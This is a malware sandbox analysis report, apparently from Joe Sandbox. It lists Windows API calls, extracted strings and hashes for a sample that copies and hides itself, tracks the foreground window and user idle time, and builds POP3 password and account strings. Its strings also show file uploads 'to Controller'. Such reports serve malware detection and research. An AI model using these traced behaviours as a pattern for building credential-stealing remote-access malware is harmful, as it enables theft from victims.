• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
• CopyFileW.KERNEL32(C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
• _wcslen.LIBCMT ref: 0040BD54
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
• CopyFileW.KERNEL32(C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000000,00000000), ref: 0040BDF2
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
• _wcslen.LIBCMT ref: 0040BE34
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
• ExitProcess.KERNEL32 ref: 0040BED0
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$del$open$BG$BG
• API String ID: 1579085052-100507993
• Opcode ID: d53b22d1013cbac7cb939b755385df34ddb64fa618ff04238cb7624026cf26e1
• Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
• Opcode Fuzzy Hash: d53b22d1013cbac7cb939b755385df34ddb64fa618ff04238cb7624026cf26e1
• Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
APIs
• LoadLibraryW.KERNEL32(winhttp.dll,?,10002B6F), ref: 10007316
• GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 10007333
• GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 10007340
• GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 1000734D
• GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 1000735A
• GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 10007367
• GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 10007374
• GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 10007381
• GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 1000738E
Strings
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: WinHttpCloseHandle$WinHttpConnect$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryDataAvailable$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$winhttp.dll
• API String ID: 2238633743-1483618772
• Opcode ID: 38b6a5f0677133c9a3ca117cc90bcc93c37312f047caed2b466f28f2473e8c26
• Instruction ID: e8a3204d4a55cb4efda40a2bc34e722aa0141a8d0c6d521df876b84b5db0583d
• Opcode Fuzzy Hash: 38b6a5f0677133c9a3ca117cc90bcc93c37312f047caed2b466f28f2473e8c26
• Instruction Fuzzy Hash: 88115430C1133896F760EBB5AC98F67BEECEB41684F60021BF504521A4D7B85587DF50
APIs
  • Part of subcall function 02831CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D1B
  • Part of subcall function 02831CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 02831D37
  • Part of subcall function 02831CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02831D4B
• _strlen.LIBCMT ref: 02831855
• _strlen.LIBCMT ref: 02831869
• _strlen.LIBCMT ref: 0283188B
• _strlen.LIBCMT ref: 028318AE
• _strlen.LIBCMT ref: 028318C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: _strlen$File$CopyCreateDelete
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 3296212668-3023110444
• Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction ID: 791fa7f1a91ea43b0193809248a271335468579a3c905e391e0964ccd815834f
• Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction Fuzzy Hash: F561F27DD00218AAEF179BA8CC48BEEB7BAAF05704F404056D94CE7250EB745A46CFD6
APIs
• lstrlenW.KERNEL32(?), ref: 0041B1E6
• _memcmp.LIBVCRUNTIME ref: 0041B1FE
• lstrlenW.KERNEL32(?), ref: 0041B217
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
• lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
• _wcslen.LIBCMT ref: 0041B2EB
                                                                                                                                                                                                                                                                                                                              • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B323
                                                                                                                                                                                                                                                                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                                                                                                                                                                                                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041B380
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                                                                                                              • API String ID: 3941738427-1684325040
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
                                                                                                                                                                                                                                                                                                                              • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                                                                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                                                                                                                                                              • API String ID: 4218353326-230879103
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3d19542244dca3626de908a7c0b74b4fd2fc1ee6c150d0fe0c94cf8249192f0b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A07117BDD052285BDF13ABA89C88ADE7BFD9B05700F1440A6D948D3240E6749B89CFE1
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3899193279-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                                                                                                                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
• API String ID: 911427763-1497357211
APIs
• DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
• GetCursorPos.USER32(?), ref: 0041CB08
• SetForegroundWindow.USER32(?), ref: 0041CB11
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
• Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
• ExitProcess.KERNEL32 ref: 0041CB84
• CreatePopupMenu.USER32 ref: 0041CB8A
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
• String ID: Close
• API String ID: 1657328048-3535843008
APIs
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
• GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
• __aulldiv.LIBCMT ref: 00407FE9
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
• CloseHandle.KERNEL32(00000000), ref: 00408200
• CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
• CloseHandle.KERNEL32(00000000), ref: 00408256
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
• API String ID: 1884690901-3066803209
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                                                                                                                                                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                                                                                                                                                                                                                              • API String ID: 3795512280-3163867910
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                                                                                                                                                                              • String ID: \ws2_32$\wship6$getaddrinfo
                                                                                                                                                                                                                                                                                                                              • API String ID: 2490988753-3078833738
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 004500C1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004500B6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004500D8
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004500ED
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004500F8
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0045011A
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0045012D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0045013B
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00450146
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0045017E
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00450185
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004501A2
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 004501BA
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 02837D06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 028390D7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 028390E9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 028390FB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 0283910D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 0283911F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 02839131
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 02839143
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 02839155
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 02839167
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 02839179
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 0283918B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 0283919D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028390BA: _free.LIBCMT ref: 028391AF
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837CFB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: HeapFree.KERNEL32(00000000,00000000,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?), ref: 02835734
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: GetLastError.KERNEL32(?,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?,?), ref: 02835746
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D1D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D32
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D3D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02837D5F
